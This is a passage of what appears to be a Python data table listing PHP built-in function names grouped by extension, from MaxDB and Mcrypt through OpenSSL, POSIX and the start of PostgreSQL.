'maxdb_enable_rpl_parse',
'maxdb_errno',
'maxdb_error',
'maxdb_escape_string',
'maxdb_execute',
'maxdb_fetch_array',
'maxdb_fetch_assoc',
'maxdb_fetch_field_direct',
'maxdb_fetch_field',
'maxdb_fetch_fields',
'maxdb_fetch_lengths',
'maxdb_fetch_object',
'maxdb_fetch_row',
'maxdb_fetch',
'maxdb_field_count',
'maxdb_field_seek',
'maxdb_field_tell',
'maxdb_free_result',
'maxdb_get_client_info',
'maxdb_get_client_version',
'maxdb_get_host_info',
'maxdb_get_metadata',
'maxdb_get_proto_info',
'maxdb_get_server_info',
'maxdb_get_server_version',
'maxdb_info',
'maxdb_init',
'maxdb_insert_id',
'maxdb_kill',
'maxdb_master_query',
'maxdb_more_results',
'maxdb_multi_query',
'maxdb_next_result',
'maxdb_num_fields',
'maxdb_num_rows',
'maxdb_options',
'maxdb_param_count',
'maxdb_ping',
'maxdb_prepare',
'maxdb_query',
'maxdb_real_connect',
'maxdb_real_escape_string',
'maxdb_real_query',
'maxdb_report',
'maxdb_rollback',
'maxdb_rpl_parse_enabled',
'maxdb_rpl_probe',
'maxdb_rpl_query_type',
'maxdb_select_db',
'maxdb_send_long_data',
'maxdb_send_query',
'maxdb_server_end',
'maxdb_server_init',
'maxdb_set_opt',
'maxdb_sqlstate',
'maxdb_ssl_set',
'maxdb_stat',
'maxdb_stmt_affected_rows',
'maxdb_stmt_bind_param',
'maxdb_stmt_bind_result',
'maxdb_stmt_close_long_data',
'maxdb_stmt_close',
'maxdb_stmt_data_seek',
'maxdb_stmt_errno',
'maxdb_stmt_error',
'maxdb_stmt_execute',
'maxdb_stmt_fetch',
'maxdb_stmt_free_result',
'maxdb_stmt_init',
'maxdb_stmt_num_rows',
'maxdb_stmt_param_count',
'maxdb_stmt_prepare',
'maxdb_stmt_reset',
'maxdb_stmt_result_metadata',
'maxdb_stmt_send_long_data',
'maxdb_stmt_sqlstate',
'maxdb_stmt_store_result',
'maxdb_store_result',
'maxdb_thread_id',
'maxdb_thread_safe',
'maxdb_use_result',
'maxdb_warning_count'],
'Mcrypt': ['mcrypt_cbc',
'mcrypt_cfb',
'mcrypt_create_iv',
'mcrypt_decrypt',
'mcrypt_ecb',
'mcrypt_enc_get_algorithms_name',
'mcrypt_enc_get_block_size',
'mcrypt_enc_get_iv_size',
'mcrypt_enc_get_key_size',
'mcrypt_enc_get_modes_name',
'mcrypt_enc_get_supported_key_sizes',
'mcrypt_enc_is_block_algorithm_mode',
'mcrypt_enc_is_block_algorithm',
'mcrypt_enc_is_block_mode',
'mcrypt_enc_self_test',
'mcrypt_encrypt',
'mcrypt_generic_deinit',
'mcrypt_generic_end',
'mcrypt_generic_init',
'mcrypt_generic',
'mcrypt_get_block_size',
'mcrypt_get_cipher_name',
'mcrypt_get_iv_size',
'mcrypt_get_key_size',
'mcrypt_list_algorithms',
'mcrypt_list_modes',
'mcrypt_module_close',
'mcrypt_module_get_algo_block_size',
'mcrypt_module_get_algo_key_size',
'mcrypt_module_get_supported_key_sizes',
'mcrypt_module_is_block_algorithm_mode',
'mcrypt_module_is_block_algorithm',
'mcrypt_module_is_block_mode',
'mcrypt_module_open',
'mcrypt_module_self_test',
'mcrypt_ofb',
'mdecrypt_generic'],
'Memcache': ['memcache_debug'],
'Mhash': ['mhash_count',
'mhash_get_block_size',
'mhash_get_hash_name',
'mhash_keygen_s2k',
'mhash'],
'Ming': ['ming_keypress',
'ming_setcubicthreshold',
'ming_setscale',
'ming_setswfcompression',
'ming_useconstants',
'ming_useswfversion'],
'Misc.': ['connection_aborted',
'connection_status',
'connection_timeout',
'constant',
'define',
'defined',
'die',
'eval',
'exit',
'get_browser',
'__halt_compiler',
'highlight_file',
'highlight_string',
'ignore_user_abort',
'pack',
'php_check_syntax',
'php_strip_whitespace',
'show_source',
'sleep',
'sys_getloadavg',
'time_nanosleep',
'time_sleep_until',
'uniqid',
'unpack',
'usleep'],
'Mongo': ['bson_decode', 'bson_encode'],
'Msession': ['msession_connect',
'msession_count',
'msession_create',
'msession_destroy',
'msession_disconnect',
'msession_find',
'msession_get_array',
'msession_get_data',
'msession_get',
'msession_inc',
'msession_list',
'msession_listvar',
'msession_lock',
'msession_plugin',
'msession_randstr',
'msession_set_array',
'msession_set_data',
'msession_set',
'msession_timeout',
'msession_uniq',
'msession_unlock'],
'Mssql': ['mssql_bind',
'mssql_close',
'mssql_connect',
'mssql_data_seek',
'mssql_execute',
'mssql_fetch_array',
'mssql_fetch_assoc',
'mssql_fetch_batch',
'mssql_fetch_field',
'mssql_fetch_object',
'mssql_fetch_row',
'mssql_field_length',
'mssql_field_name',
'mssql_field_seek',
'mssql_field_type',
'mssql_free_result',
'mssql_free_statement',
'mssql_get_last_message',
'mssql_guid_string',
'mssql_init',
'mssql_min_error_severity',
'mssql_min_message_severity',
'mssql_next_result',
'mssql_num_fields',
'mssql_num_rows',
'mssql_pconnect',
'mssql_query',
'mssql_result',
'mssql_rows_affected',
'mssql_select_db'],
'Multibyte String': ['mb_check_encoding',
'mb_convert_case',
'mb_convert_encoding',
'mb_convert_kana',
'mb_convert_variables',
'mb_decode_mimeheader',
'mb_decode_numericentity',
'mb_detect_encoding',
'mb_detect_order',
'mb_encode_mimeheader',
'mb_encode_numericentity',
'mb_encoding_aliases',
'mb_ereg_match',
'mb_ereg_replace_callback',
'mb_ereg_replace',
'mb_ereg_search_getpos',
'mb_ereg_search_getregs',
'mb_ereg_search_init',
'mb_ereg_search_pos',
'mb_ereg_search_regs',
'mb_ereg_search_setpos',
'mb_ereg_search',
'mb_ereg',
'mb_eregi_replace',
'mb_eregi',
'mb_get_info',
'mb_http_input',
'mb_http_output',
'mb_internal_encoding',
'mb_language',
'mb_list_encodings',
'mb_output_handler',
'mb_parse_str',
'mb_preferred_mime_name',
'mb_regex_encoding',
'mb_regex_set_options',
'mb_send_mail',
'mb_split',
'mb_strcut',
'mb_strimwidth',
'mb_stripos',
'mb_stristr',
'mb_strlen',
'mb_strpos',
'mb_strrchr',
'mb_strrichr',
'mb_strripos',
'mb_strrpos',
'mb_strstr',
'mb_strtolower',
'mb_strtoupper',
'mb_strwidth',
'mb_substitute_character',
'mb_substr_count',
'mb_substr'],
'MySQL': ['mysql_affected_rows',
'mysql_client_encoding',
'mysql_close',
'mysql_connect',
'mysql_create_db',
'mysql_data_seek',
'mysql_db_name',
'mysql_db_query',
'mysql_drop_db',
'mysql_errno',
'mysql_error',
'mysql_escape_string',
'mysql_fetch_array',
'mysql_fetch_assoc',
'mysql_fetch_field',
'mysql_fetch_lengths',
'mysql_fetch_object',
'mysql_fetch_row',
'mysql_field_flags',
'mysql_field_len',
'mysql_field_name',
'mysql_field_seek',
'mysql_field_table',
'mysql_field_type',
'mysql_free_result',
'mysql_get_client_info',
'mysql_get_host_info',
'mysql_get_proto_info',
'mysql_get_server_info',
'mysql_info',
'mysql_insert_id',
'mysql_list_dbs',
'mysql_list_fields',
'mysql_list_processes',
'mysql_list_tables',
'mysql_num_fields',
'mysql_num_rows',
'mysql_pconnect',
'mysql_ping',
'mysql_query',
'mysql_real_escape_string',
'mysql_result',
'mysql_select_db',
'mysql_set_charset',
'mysql_stat',
'mysql_tablename',
'mysql_thread_id',
'mysql_unbuffered_query'],
'Mysqlnd_memcache': ['mysqlnd_memcache_get_config', 'mysqlnd_memcache_set'],
'Mysqlnd_ms': ['mysqlnd_ms_dump_servers',
'mysqlnd_ms_fabric_select_global',
'mysqlnd_ms_fabric_select_shard',
'mysqlnd_ms_get_last_gtid',
'mysqlnd_ms_get_last_used_connection',
'mysqlnd_ms_get_stats',
'mysqlnd_ms_match_wild',
'mysqlnd_ms_query_is_select',
'mysqlnd_ms_set_qos',
'mysqlnd_ms_set_user_pick_server'],
'Mysqlnd_uh': ['mysqlnd_uh_convert_to_mysqlnd',
'mysqlnd_uh_set_connection_proxy',
'mysqlnd_uh_set_statement_proxy'],
'NSAPI': ['nsapi_request_headers', 'nsapi_response_headers', 'nsapi_virtual'],
'Ncurses': ['ncurses_addch',
'ncurses_addchnstr',
'ncurses_addchstr',
'ncurses_addnstr',
'ncurses_addstr',
'ncurses_assume_default_colors',
'ncurses_attroff',
'ncurses_attron',
'ncurses_attrset',
'ncurses_baudrate',
'ncurses_beep',
'ncurses_bkgd',
'ncurses_bkgdset',
'ncurses_border',
'ncurses_bottom_panel',
'ncurses_can_change_color',
'ncurses_cbreak',
'ncurses_clear',
'ncurses_clrtobot',
'ncurses_clrtoeol',
'ncurses_color_content',
'ncurses_color_set',
'ncurses_curs_set',
'ncurses_def_prog_mode',
'ncurses_def_shell_mode',
'ncurses_define_key',
'ncurses_del_panel',
'ncurses_delay_output',
'ncurses_delch',
'ncurses_deleteln',
'ncurses_delwin',
'ncurses_doupdate',
'ncurses_echo',
'ncurses_echochar',
'ncurses_end',
'ncurses_erase',
'ncurses_erasechar',
'ncurses_filter',
'ncurses_flash',
'ncurses_flushinp',
'ncurses_getch',
'ncurses_getmaxyx',
'ncurses_getmouse',
'ncurses_getyx',
'ncurses_halfdelay',
'ncurses_has_colors',
'ncurses_has_ic',
'ncurses_has_il',
'ncurses_has_key',
'ncurses_hide_panel',
'ncurses_hline',
'ncurses_inch',
'ncurses_init_color',
'ncurses_init_pair',
'ncurses_init',
'ncurses_insch',
'ncurses_insdelln',
'ncurses_insertln',
'ncurses_insstr',
'ncurses_instr',
'ncurses_isendwin',
'ncurses_keyok',
'ncurses_keypad',
'ncurses_killchar',
'ncurses_longname',
'ncurses_meta',
'ncurses_mouse_trafo',
'ncurses_mouseinterval',
'ncurses_mousemask',
'ncurses_move_panel',
'ncurses_move',
'ncurses_mvaddch',
'ncurses_mvaddchnstr',
'ncurses_mvaddchstr',
'ncurses_mvaddnstr',
'ncurses_mvaddstr',
'ncurses_mvcur',
'ncurses_mvdelch',
'ncurses_mvgetch',
'ncurses_mvhline',
'ncurses_mvinch',
'ncurses_mvvline',
'ncurses_mvwaddstr',
'ncurses_napms',
'ncurses_new_panel',
'ncurses_newpad',
'ncurses_newwin',
'ncurses_nl',
'ncurses_nocbreak',
'ncurses_noecho',
'ncurses_nonl',
'ncurses_noqiflush',
'ncurses_noraw',
'ncurses_pair_content',
'ncurses_panel_above',
'ncurses_panel_below',
'ncurses_panel_window',
'ncurses_pnoutrefresh',
'ncurses_prefresh',
'ncurses_putp',
'ncurses_qiflush',
'ncurses_raw',
'ncurses_refresh',
'ncurses_replace_panel',
'ncurses_reset_prog_mode',
'ncurses_reset_shell_mode',
'ncurses_resetty',
'ncurses_savetty',
'ncurses_scr_dump',
'ncurses_scr_init',
'ncurses_scr_restore',
'ncurses_scr_set',
'ncurses_scrl',
'ncurses_show_panel',
'ncurses_slk_attr',
'ncurses_slk_attroff',
'ncurses_slk_attron',
'ncurses_slk_attrset',
'ncurses_slk_clear',
'ncurses_slk_color',
'ncurses_slk_init',
'ncurses_slk_noutrefresh',
'ncurses_slk_refresh',
'ncurses_slk_restore',
'ncurses_slk_set',
'ncurses_slk_touch',
'ncurses_standend',
'ncurses_standout',
'ncurses_start_color',
'ncurses_termattrs',
'ncurses_termname',
'ncurses_timeout',
'ncurses_top_panel',
'ncurses_typeahead',
'ncurses_ungetch',
'ncurses_ungetmouse',
'ncurses_update_panels',
'ncurses_use_default_colors',
'ncurses_use_env',
'ncurses_use_extended_names',
'ncurses_vidattr',
'ncurses_vline',
'ncurses_waddch',
'ncurses_waddstr',
'ncurses_wattroff',
'ncurses_wattron',
'ncurses_wattrset',
'ncurses_wborder',
'ncurses_wclear',
'ncurses_wcolor_set',
'ncurses_werase',
'ncurses_wgetch',
'ncurses_whline',
'ncurses_wmouse_trafo',
'ncurses_wmove',
'ncurses_wnoutrefresh',
'ncurses_wrefresh',
'ncurses_wstandend',
'ncurses_wstandout',
'ncurses_wvline'],
'Network': ['checkdnsrr',
'closelog',
'define_syslog_variables',
'dns_check_record',
'dns_get_mx',
'dns_get_record',
'fsockopen',
'gethostbyaddr',
'gethostbyname',
'gethostbynamel',
'gethostname',
'getmxrr',
'getprotobyname',
'getprotobynumber',
'getservbyname',
'getservbyport',
'header_register_callback',
'header_remove',
'header',
'headers_list',
'headers_sent',
'http_response_code',
'inet_ntop',
'inet_pton',
'ip2long',
'long2ip',
'openlog',
'pfsockopen',
'setcookie',
'setrawcookie',
'socket_get_status',
'socket_set_blocking',
'socket_set_timeout',
'syslog'],
'Newt': ['newt_bell',
'newt_button_bar',
'newt_button',
'newt_centered_window',
'newt_checkbox_get_value',
'newt_checkbox_set_flags',
'newt_checkbox_set_value',
'newt_checkbox_tree_add_item',
'newt_checkbox_tree_find_item',
'newt_checkbox_tree_get_current',
'newt_checkbox_tree_get_entry_value',
'newt_checkbox_tree_get_multi_selection',
'newt_checkbox_tree_get_selection',
'newt_checkbox_tree_multi',
'newt_checkbox_tree_set_current',
'newt_checkbox_tree_set_entry_value',
'newt_checkbox_tree_set_entry',
'newt_checkbox_tree_set_width',
'newt_checkbox_tree',
'newt_checkbox',
'newt_clear_key_buffer',
'newt_cls',
'newt_compact_button',
'newt_component_add_callback',
'newt_component_takes_focus',
'newt_create_grid',
'newt_cursor_off',
'newt_cursor_on',
'newt_delay',
'newt_draw_form',
'newt_draw_root_text',
'newt_entry_get_value',
'newt_entry_set_filter',
'newt_entry_set_flags',
'newt_entry_set',
'newt_entry',
'newt_finished',
'newt_form_add_component',
'newt_form_add_components',
'newt_form_add_hot_key',
'newt_form_destroy',
'newt_form_get_current',
'newt_form_run',
'newt_form_set_background',
'newt_form_set_height',
'newt_form_set_size',
'newt_form_set_timer',
'newt_form_set_width',
'newt_form_watch_fd',
'newt_form',
'newt_get_screen_size',
'newt_grid_add_components_to_form',
'newt_grid_basic_window',
'newt_grid_free',
'newt_grid_get_size',
'newt_grid_h_close_stacked',
'newt_grid_h_stacked',
'newt_grid_place',
'newt_grid_set_field',
'newt_grid_simple_window',
'newt_grid_v_close_stacked',
'newt_grid_v_stacked',
'newt_grid_wrapped_window_at',
'newt_grid_wrapped_window',
'newt_init',
'newt_label_set_text',
'newt_label',
'newt_listbox_append_entry',
'newt_listbox_clear_selection',
'newt_listbox_clear',
'newt_listbox_delete_entry',
'newt_listbox_get_current',
'newt_listbox_get_selection',
'newt_listbox_insert_entry',
'newt_listbox_item_count',
'newt_listbox_select_item',
'newt_listbox_set_current_by_key',
'newt_listbox_set_current',
'newt_listbox_set_data',
'newt_listbox_set_entry',
'newt_listbox_set_width',
'newt_listbox',
'newt_listitem_get_data',
'newt_listitem_set',
'newt_listitem',
'newt_open_window',
'newt_pop_help_line',
'newt_pop_window',
'newt_push_help_line',
'newt_radio_get_current',
'newt_radiobutton',
'newt_redraw_help_line',
'newt_reflow_text',
'newt_refresh',
'newt_resize_screen',
'newt_resume',
'newt_run_form',
'newt_scale_set',
'newt_scale',
'newt_scrollbar_set',
'newt_set_help_callback',
'newt_set_suspend_callback',
'newt_suspend',
'newt_textbox_get_num_lines',
'newt_textbox_reflowed',
'newt_textbox_set_height',
'newt_textbox_set_text',
'newt_textbox',
'newt_vertical_scrollbar',
'newt_wait_for_key',
'newt_win_choice',
'newt_win_entries',
'newt_win_menu',
'newt_win_message',
'newt_win_messagev',
'newt_win_ternary'],
'OAuth': ['oauth_get_sbs', 'oauth_urlencode'],
'OCI8': ['oci_bind_array_by_name',
'oci_bind_by_name',
'oci_cancel',
'oci_client_version',
'oci_close',
'oci_commit',
'oci_connect',
'oci_define_by_name',
'oci_error',
'oci_execute',
'oci_fetch_all',
'oci_fetch_array',
'oci_fetch_assoc',
'oci_fetch_object',
'oci_fetch_row',
'oci_fetch',
'oci_field_is_null',
'oci_field_name',
'oci_field_precision',
'oci_field_scale',
'oci_field_size',
'oci_field_type_raw',
'oci_field_type',
'oci_free_descriptor',
'oci_free_statement',
'oci_get_implicit_resultset',
'oci_internal_debug',
'oci_lob_copy',
'oci_lob_is_equal',
'oci_new_collection',
'oci_new_connect',
'oci_new_cursor',
'oci_new_descriptor',
'oci_num_fields',
'oci_num_rows',
'oci_parse',
'oci_password_change',
'oci_pconnect',
'oci_result',
'oci_rollback',
'oci_server_version',
'oci_set_action',
'oci_set_client_identifier',
'oci_set_client_info',
'oci_set_edition',
'oci_set_module_name',
'oci_set_prefetch',
'oci_statement_type'],
'ODBC': ['odbc_autocommit',
'odbc_binmode',
'odbc_close_all',
'odbc_close',
'odbc_columnprivileges',
'odbc_columns',
'odbc_commit',
'odbc_connect',
'odbc_cursor',
'odbc_data_source',
'odbc_do',
'odbc_error',
'odbc_errormsg',
'odbc_exec',
'odbc_execute',
'odbc_fetch_array',
'odbc_fetch_into',
'odbc_fetch_object',
'odbc_fetch_row',
'odbc_field_len',
'odbc_field_name',
'odbc_field_num',
'odbc_field_precision',
'odbc_field_scale',
'odbc_field_type',
'odbc_foreignkeys',
'odbc_free_result',
'odbc_gettypeinfo',
'odbc_longreadlen',
'odbc_next_result',
'odbc_num_fields',
'odbc_num_rows',
'odbc_pconnect',
'odbc_prepare',
'odbc_primarykeys',
'odbc_procedurecolumns',
'odbc_procedures',
'odbc_result_all',
'odbc_result',
'odbc_rollback',
'odbc_setoption',
'odbc_specialcolumns',
'odbc_statistics',
'odbc_tableprivileges',
'odbc_tables'],
'OPcache': ['opcache_compile_file',
'opcache_get_configuration',
'opcache_get_status',
'opcache_invalidate',
'opcache_reset'],
'Object Aggregation': ['aggregate_info',
'aggregate_methods_by_list',
'aggregate_methods_by_regexp',
'aggregate_methods',
'aggregate_properties_by_list',
'aggregate_properties_by_regexp',
'aggregate_properties',
'aggregate',
'aggregation_info',
'deaggregate'],
'OpenAL': ['openal_buffer_create',
'openal_buffer_data',
'openal_buffer_destroy',
'openal_buffer_get',
'openal_buffer_loadwav',
'openal_context_create',
'openal_context_current',
'openal_context_destroy',
'openal_context_process',
'openal_context_suspend',
'openal_device_close',
'openal_device_open',
'openal_listener_get',
'openal_listener_set',
'openal_source_create',
'openal_source_destroy',
'openal_source_get',
'openal_source_pause',
'openal_source_play',
'openal_source_rewind',
'openal_source_set',
'openal_source_stop',
'openal_stream'],
'OpenSSL': ['openssl_cipher_iv_length',
'openssl_csr_export_to_file',
'openssl_csr_export',
'openssl_csr_get_public_key',
'openssl_csr_get_subject',
'openssl_csr_new',
'openssl_csr_sign',
'openssl_decrypt',
'openssl_dh_compute_key',
'openssl_digest',
'openssl_encrypt',
'openssl_error_string',
'openssl_free_key',
'openssl_get_cipher_methods',
'openssl_get_md_methods',
'openssl_get_privatekey',
'openssl_get_publickey',
'openssl_open',
'openssl_pbkdf2',
'openssl_pkcs12_export_to_file',
'openssl_pkcs12_export',
'openssl_pkcs12_read',
'openssl_pkcs7_decrypt',
'openssl_pkcs7_encrypt',
'openssl_pkcs7_sign',
'openssl_pkcs7_verify',
'openssl_pkey_export_to_file',
'openssl_pkey_export',
'openssl_pkey_free',
'openssl_pkey_get_details',
'openssl_pkey_get_private',
'openssl_pkey_get_public',
'openssl_pkey_new',
'openssl_private_decrypt',
'openssl_private_encrypt',
'openssl_public_decrypt',
'openssl_public_encrypt',
'openssl_random_pseudo_bytes',
'openssl_seal',
'openssl_sign',
'openssl_spki_export_challenge',
'openssl_spki_export',
'openssl_spki_new',
'openssl_spki_verify',
'openssl_verify',
'openssl_x509_check_private_key',
'openssl_x509_checkpurpose',
'openssl_x509_export_to_file',
'openssl_x509_export',
'openssl_x509_free',
'openssl_x509_parse',
'openssl_x509_read'],
'Output Control': ['flush',
'ob_clean',
'ob_end_clean',
'ob_end_flush',
'ob_flush',
'ob_get_clean',
'ob_get_contents',
'ob_get_flush',
'ob_get_length',
'ob_get_level',
'ob_get_status',
'ob_gzhandler',
'ob_implicit_flush',
'ob_list_handlers',
'ob_start',
'output_add_rewrite_var',
'output_reset_rewrite_vars'],
'Ovrimos SQL': ['ovrimos_close',
'ovrimos_commit',
'ovrimos_connect',
'ovrimos_cursor',
'ovrimos_exec',
'ovrimos_execute',
'ovrimos_fetch_into',
'ovrimos_fetch_row',
'ovrimos_field_len',
'ovrimos_field_name',
'ovrimos_field_num',
'ovrimos_field_type',
'ovrimos_free_result',
'ovrimos_longreadlen',
'ovrimos_num_fields',
'ovrimos_num_rows',
'ovrimos_prepare',
'ovrimos_result_all',
'ovrimos_result',
'ovrimos_rollback'],
'PCNTL': ['pcntl_alarm',
'pcntl_errno',
'pcntl_exec',
'pcntl_fork',
'pcntl_get_last_error',
'pcntl_getpriority',
'pcntl_setpriority',
'pcntl_signal_dispatch',
'pcntl_signal',
'pcntl_sigprocmask',
'pcntl_sigtimedwait',
'pcntl_sigwaitinfo',
'pcntl_strerror',
'pcntl_wait',
'pcntl_waitpid',
'pcntl_wexitstatus',
'pcntl_wifexited',
'pcntl_wifsignaled',
'pcntl_wifstopped',
'pcntl_wstopsig',
'pcntl_wtermsig'],
'PCRE': ['preg_filter',
'preg_grep',
'preg_last_error',
'preg_match_all',
'preg_match',
'preg_quote',
'preg_replace_callback',
'preg_replace',
'preg_split'],
'PDF': ['PDF_activate_item',
'PDF_add_annotation',
'PDF_add_bookmark',
'PDF_add_launchlink',
'PDF_add_locallink',
'PDF_add_nameddest',
'PDF_add_note',
'PDF_add_outline',
'PDF_add_pdflink',
'PDF_add_table_cell',
'PDF_add_textflow',
'PDF_add_thumbnail',
'PDF_add_weblink',
'PDF_arc',
'PDF_arcn',
'PDF_attach_file',
'PDF_begin_document',
'PDF_begin_font',
'PDF_begin_glyph',
'PDF_begin_item',
'PDF_begin_layer',
'PDF_begin_page_ext',
'PDF_begin_page',
'PDF_begin_pattern',
'PDF_begin_template_ext',
'PDF_begin_template',
'PDF_circle',
'PDF_clip',
'PDF_close_image',
'PDF_close_pdi_page',
'PDF_close_pdi',
'PDF_close',
'PDF_closepath_fill_stroke',
'PDF_closepath_stroke',
'PDF_closepath',
'PDF_concat',
'PDF_continue_text',
'PDF_create_3dview',
'PDF_create_action',
'PDF_create_annotation',
'PDF_create_bookmark',
'PDF_create_field',
'PDF_create_fieldgroup',
'PDF_create_gstate',
'PDF_create_pvf',
'PDF_create_textflow',
'PDF_curveto',
'PDF_define_layer',
'PDF_delete_pvf',
'PDF_delete_table',
'PDF_delete_textflow',
'PDF_delete',
'PDF_encoding_set_char',
'PDF_end_document',
'PDF_end_font',
'PDF_end_glyph',
'PDF_end_item',
'PDF_end_layer',
'PDF_end_page_ext',
'PDF_end_page',
'PDF_end_pattern',
'PDF_end_template',
'PDF_endpath',
'PDF_fill_imageblock',
'PDF_fill_pdfblock',
'PDF_fill_stroke',
'PDF_fill_textblock',
'PDF_fill',
'PDF_findfont',
'PDF_fit_image',
'PDF_fit_pdi_page',
'PDF_fit_table',
'PDF_fit_textflow',
'PDF_fit_textline',
'PDF_get_apiname',
'PDF_get_buffer',
'PDF_get_errmsg',
'PDF_get_errnum',
'PDF_get_font',
'PDF_get_fontname',
'PDF_get_fontsize',
'PDF_get_image_height',
'PDF_get_image_width',
'PDF_get_majorversion',
'PDF_get_minorversion',
'PDF_get_parameter',
'PDF_get_pdi_parameter',
'PDF_get_pdi_value',
'PDF_get_value',
'PDF_info_font',
'PDF_info_matchbox',
'PDF_info_table',
'PDF_info_textflow',
'PDF_info_textline',
'PDF_initgraphics',
'PDF_lineto',
'PDF_load_3ddata',
'PDF_load_font',
'PDF_load_iccprofile',
'PDF_load_image',
'PDF_makespotcolor',
'PDF_moveto',
'PDF_new',
'PDF_open_ccitt',
'PDF_open_file',
'PDF_open_gif',
'PDF_open_image_file',
'PDF_open_image',
'PDF_open_jpeg',
'PDF_open_memory_image',
'PDF_open_pdi_document',
'PDF_open_pdi_page',
'PDF_open_pdi',
'PDF_open_tiff',
'PDF_pcos_get_number',
'PDF_pcos_get_stream',
'PDF_pcos_get_string',
'PDF_place_image',
'PDF_place_pdi_page',
'PDF_process_pdi',
'PDF_rect',
'PDF_restore',
'PDF_resume_page',
'PDF_rotate',
'PDF_save',
'PDF_scale',
'PDF_set_border_color',
'PDF_set_border_dash',
'PDF_set_border_style',
'PDF_set_char_spacing',
'PDF_set_duration',
'PDF_set_gstate',
'PDF_set_horiz_scaling',
'PDF_set_info_author',
'PDF_set_info_creator',
'PDF_set_info_keywords',
'PDF_set_info_subject',
'PDF_set_info_title',
'PDF_set_info',
'PDF_set_layer_dependency',
'PDF_set_leading',
'PDF_set_parameter',
'PDF_set_text_matrix',
'PDF_set_text_pos',
'PDF_set_text_rendering',
'PDF_set_text_rise',
'PDF_set_value',
'PDF_set_word_spacing',
'PDF_setcolor',
'PDF_setdash',
'PDF_setdashpattern',
'PDF_setflat',
'PDF_setfont',
'PDF_setgray_fill',
'PDF_setgray_stroke',
'PDF_setgray',
'PDF_setlinecap',
'PDF_setlinejoin',
'PDF_setlinewidth',
'PDF_setmatrix',
'PDF_setmiterlimit',
'PDF_setpolydash',
'PDF_setrgbcolor_fill',
'PDF_setrgbcolor_stroke',
'PDF_setrgbcolor',
'PDF_shading_pattern',
'PDF_shading',
'PDF_shfill',
'PDF_show_boxed',
'PDF_show_xy',
'PDF_show',
'PDF_skew',
'PDF_stringwidth',
'PDF_stroke',
'PDF_suspend_page',
'PDF_translate',
'PDF_utf16_to_utf8',
'PDF_utf32_to_utf16',
'PDF_utf8_to_utf16'],
'PHP Options/Info': ['assert_options',
'assert',
'cli_get_process_title',
'cli_set_process_title',
'dl',
'extension_loaded',
'gc_collect_cycles',
'gc_disable',
'gc_enable',
'gc_enabled',
'get_cfg_var',
'get_current_user',
'get_defined_constants',
'get_extension_funcs',
'get_include_path',
'get_included_files',
'get_loaded_extensions',
'get_magic_quotes_gpc',
'get_magic_quotes_runtime',
'get_required_files',
'getenv',
'getlastmod',
'getmygid',
'getmyinode',
'getmypid',
'getmyuid',
'getopt',
'getrusage',
'ini_alter',
'ini_get_all',
'ini_get',
'ini_restore',
'ini_set',
'magic_quotes_runtime',
'memory_get_peak_usage',
'memory_get_usage',
'php_ini_loaded_file',
'php_ini_scanned_files',
'php_logo_guid',
'php_sapi_name',
'php_uname',
'phpcredits',
'phpinfo',
'phpversion',
'putenv',
'restore_include_path',
'set_include_path',
'set_magic_quotes_runtime',
'set_time_limit',
'sys_get_temp_dir',
'version_compare',
'zend_logo_guid',
'zend_thread_id',
'zend_version'],
'POSIX': ['posix_access',
'posix_ctermid',
'posix_errno',
'posix_get_last_error',
'posix_getcwd',
'posix_getegid',
'posix_geteuid',
'posix_getgid',
'posix_getgrgid',
'posix_getgrnam',
'posix_getgroups',
'posix_getlogin',
'posix_getpgid',
'posix_getpgrp',
'posix_getpid',
'posix_getppid',
'posix_getpwnam',
'posix_getpwuid',
'posix_getrlimit',
'posix_getsid',
'posix_getuid',
'posix_initgroups',
'posix_isatty',
'posix_kill',
'posix_mkfifo',
'posix_mknod',
'posix_setegid',
'posix_seteuid',
'posix_setgid',
'posix_setpgid',
'posix_setsid',
'posix_setuid',
'posix_strerror',
'posix_times',
'posix_ttyname',
'posix_uname'],
'POSIX Regex': ['ereg_replace',
'ereg',
'eregi_replace',
'eregi',
'split',
'spliti',
'sql_regcase'],
'PS': ['ps_add_bookmark',
'ps_add_launchlink',
'ps_add_locallink',
'ps_add_note',
'ps_add_pdflink',
'ps_add_weblink',
'ps_arc',
'ps_arcn',
'ps_begin_page',
'ps_begin_pattern',
'ps_begin_template',
'ps_circle',
'ps_clip',
'ps_close_image',
'ps_close',
'ps_closepath_stroke',
'ps_closepath',
'ps_continue_text',
'ps_curveto',
'ps_delete',
'ps_end_page',
'ps_end_pattern',
'ps_end_template',
'ps_fill_stroke',
'ps_fill',
'ps_findfont',
'ps_get_buffer',
'ps_get_parameter',
'ps_get_value',
'ps_hyphenate',
'ps_include_file',
'ps_lineto',
'ps_makespotcolor',
'ps_moveto',
'ps_new',
'ps_open_file',
'ps_open_image_file',
'ps_open_image',
'ps_open_memory_image',
'ps_place_image',
'ps_rect',
'ps_restore',
'ps_rotate',
'ps_save',
'ps_scale',
'ps_set_border_color',
'ps_set_border_dash',
'ps_set_border_style',
'ps_set_info',
'ps_set_parameter',
'ps_set_text_pos',
'ps_set_value',
'ps_setcolor',
'ps_setdash',
'ps_setflat',
'ps_setfont',
'ps_setgray',
'ps_setlinecap',
'ps_setlinejoin',
'ps_setlinewidth',
'ps_setmiterlimit',
'ps_setoverprintmode',
'ps_setpolydash',
'ps_shading_pattern',
'ps_shading',
'ps_shfill',
'ps_show_boxed',
'ps_show_xy2',
'ps_show_xy',
'ps_show2',
'ps_show',
'ps_string_geometry',
'ps_stringwidth',
'ps_stroke',
'ps_symbol_name',
'ps_symbol_width',
'ps_symbol',
'ps_translate'],
'Paradox': ['px_close',
'px_create_fp',
'px_date2string',
'px_delete_record',
'px_delete',
'px_get_field',
'px_get_info',
'px_get_parameter',
'px_get_record',
'px_get_schema',
'px_get_value',
'px_insert_record',
'px_new',
'px_numfields',
'px_numrecords',
'px_open_fp',
'px_put_record',
'px_retrieve_record',
'px_set_blob_file',
'px_set_parameter',
'px_set_tablename',
'px_set_targetencoding',
'px_set_value',
'px_timestamp2string',
'px_update_record'],
'Parsekit': ['parsekit_compile_file',
'parsekit_compile_string',
'parsekit_func_arginfo'],
'Password Hashing': ['password_get_info',
'password_hash',
'password_needs_rehash',
'password_verify'],
'PostgreSQL': ['pg_affected_rows',
'pg_cancel_query',
'pg_client_encoding',
'pg_close',
'pg_connect',
'pg_connection_busy',
'pg_connection_reset',
'pg_connection_status',
'pg_convert',
'pg_copy_from',
'pg_copy_to',
'pg_dbname',
'pg_delete',
'pg_end_copy',
'pg_escape_bytea',
'pg_escape_identifier',
'pg_escape_literal',
'pg_escape_string',
'pg_execute',
'pg_fetch_all_columns',
'pg_fetch_all',
'pg_fetch_array',
'pg_fetch_assoc',
'pg_fetch_object',
